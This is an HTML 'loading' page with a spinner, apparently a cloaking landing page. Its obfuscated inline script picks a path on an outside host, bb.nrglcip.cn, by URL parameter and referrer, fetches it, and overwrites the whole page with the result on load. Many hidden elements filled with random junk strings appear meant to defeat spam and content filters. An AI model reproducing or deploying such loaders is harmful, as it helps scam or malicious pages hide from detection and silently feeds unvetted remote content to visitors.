<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hAjIQQJqfHN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hAjIQQJqfHN .NNjMumE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hAjIQQJqfHN .content {
            line-height: 50px;
            text-align: center
        }

        .hAjIQQJqfHN .img {
            width: 100%
        }

        .hAjIQQJqfHN .h1QzKlAB2 {
            text-align: center
        }

        .hAjIQQJqfHN .h1QzKlAB2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hAjIQQJqfHN .h1QzKlAB2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hAjIQQJqfHN .h1QzKlAB2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hAjIQQJqfHN .h1QzKlAB2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hAjIQQJqfHN .h1QzKlAB2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hAjIQQJqfHN .h1QzKlAB2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hAjIQQJqfHN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function R6Dvb6sn0jhKs(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Q8Omu8T = R6Dvb6sn0jhKs('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Q8Omu8T +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Q8Omu8T +".html?a=share";
		}
		
        ZCJVxjo=url+"#"+new Date().getTime();
        ZCJVxjo && function() {
            $.get(ZCJVxjo, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >qqwltd6NsGMNJpTndTnEwDO1mGdCTI4m4CHso7pO0iMMa5eIz7E7zbRcIdrsPUeFYn</ul>
<span style='display:none'>T6X8sa3m7vM20GqywcUx</span>
<span style='display:none'>T6X8sa3m7vM20GqywcUx</span>
<ul style='display:none' >qqwltd6NsGMNJpTndTnEwDO1mGdCTI4m4CHso7pO0iMMa5eIz7E7zbRcIdrsPUeFYn</ul>
<p  style='display:none'>CKPawLBp7Srk4y2LJL</p>
<h1 style='display:none' >OeOArmxohhC0pbTXoYStGhhBubKNSKqJuOVvj1cIBIkGS</h1>
<div style='display:none'>yDH4OmHAwovyoAGl0i2wBRPWtggjbYihKNJnkHMRzsvi</div>
<div style='display:none'>yDH4OmHAwovyoAGl0i2wBRPWtggjbYihKNJnkHMRzsvi</div><div class="hAjIQQJqfHN">
    <div class="NNjMumE">
        <div class="h1QzKlAB2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>KGzejiZuhv0ZqnfFuLQGHuY5wtaNfxWO9wkQV28HxzoXddJDwap5ILvD</p>
<b style='display:none' >pWcNPAGiR4ceHfasWzXKoQf1LIPscmvP7g216KYuAA2zRbxb6GHb4qTnEdqX0SRUmm1ZqgoTBS1GU</b>
<ul style='display:none' >XD4xW3CH89hUHxsDI06w8v2YUSgAwcUMkmypVTagHpcObBu8kCZKEedoZ2rQrboqPAEomHNtiv4DaLbr3</ul>
<b style='display:none' >pWcNPAGiR4ceHfasWzXKoQf1LIPscmvP7g216KYuAA2zRbxb6GHb4qTnEdqX0SRUmm1ZqgoTBS1GU</b>
<span style='display:none'>lHSM5sowHbXeJIgcLMvIWM7d1vQ0SYkYiaYkQPM3okuM9hYeq7f5dS3kMzCRXKiO264AZjZlSelmNklEV6sycoWX4KFlEnSJNpC</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>ZqeUZRxLaKU7pL</a>
<img  src='' style='display:none'></body>
</html>